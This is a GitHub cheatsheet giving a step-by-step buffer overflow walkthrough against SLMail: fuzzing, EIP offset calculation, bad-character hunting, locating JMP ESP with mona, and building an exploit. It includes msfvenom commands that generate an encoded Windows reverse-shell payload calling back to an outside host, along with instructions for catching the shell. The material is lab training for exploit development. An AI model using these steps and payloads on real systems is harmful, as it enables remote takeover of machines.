forked from OlivierLaflamme/Cheatsheet-God
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Cheatsheet_BOF.txt
66 lines (56 loc) · 3.79 KB
/
Cheatsheet_BOF.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
Simple Buffer Overflow Walkthrough (SLMail example)
1. running 1_inititalFuzzer.py : program beaks at a payload length of 2700 bit
2. runing 2_lenCheck.py using different payload sizes
Run:
1 - 3000 writes 41414141 in EIP
2 - 4000 writes 41414141 in EIP
-> choosing a payload of size 4000
3. determine the location of the EIP value:
1 - msf-pattern_create -l 4000
2 - use the pattern as payload -> run 3_patternCheck.py
3 - Determine Value in EIP using immunityDebugger -> 39694438 -> 9iD8 - 8Di9
4 - Calculate the offset -> msf-pattern_offset -q 8Di9 -> 2606
4. Justifying the offset:
1 - running 4_justifyOffset.py immunityDebugger shows 42424242 in EIP
5. Determine bad characters
1 - running 5_badCharacers.py to determine bad characters -> look in
immunityDebugger which char breaks the allChar sequence and delete it in second run
Doing this until all bad char are determined
-> deleted char in 5_badCharacers_deleted.py --> \x00\x0a\x0d
6. Find a way to execute shell code
1 - ESP points to the beginnig of the "43434343" part of the payload (4_justifyOffset.py)
2 - Therefore searching for a JMP ESP instruction on a static address:
1 - !mona modules -> no memory protection & address range does not contain bad characters
-> Rebase | SafeSEH | ASLR | NXCompact | OS Dll
false false false false true
2 - Find JMP ESP instruction in determined dll (module)
-> e - 'icon' -> select determined dll and double klick on it
-> Loads the beginning of the executable region of the dll
-> right klick -> Search for -> Command -> JMP ESP
OR right klick -> Search for -> Command sequence -> PUSH ESP \n RETN
OR Since the dll is not DEP protected other sections of the dll can also be executed
Search outside the executable region of the dll:
-> m - 'icon' to check which sections of the ddl are marked as executable
-> use mona to find specfic bytes in a memory range
-> msf-nasm_shell -> JMP ESP -> op-code: FFE4
-> !mona find -s "\xff\xe4" -m ddlname.dll
-> Take one address of the results which does not contain any bad characters
-> Justify that address contains JMP ESP:
-> "blue arrow black points" - icon -> paste the specific address
3 - replace the "B"-part with the address and set a breakpoint at the address in immunityDebugger (little endian format)
-> when program pauses execution, the breakpoint should be reached.
-> executing the JMP ESP instruction (next step) by (F7 or "red 90deg error with red dots"-icon)
-> EIP shoul now point to the "C" Section of the payload
7. Including a Payload
1 - Creating Payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.178.73 LPORT=443 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f python
2 - putting a nopsled (some \x90-Bytes) and the Exploit-Code into the script as follows. "A"s + Address + nopsled + exploit + "C"s
3 - start listener according to the exploit
4 - runnig script 7_Exploit-revShell.py
5 - Catching the reverse shell
The exploit breaks the program flow of SLMail. You get a shell but you can use the exploit only once until someone restarts the software
8. Get a more stable exploit:
1 - Creating Payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.178.73 LPORT=443 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f python
2 - Changing the payload of the 7_Exploit script
3 - You now can run the script and catch the shell multiple times without breaking the SLMail program flow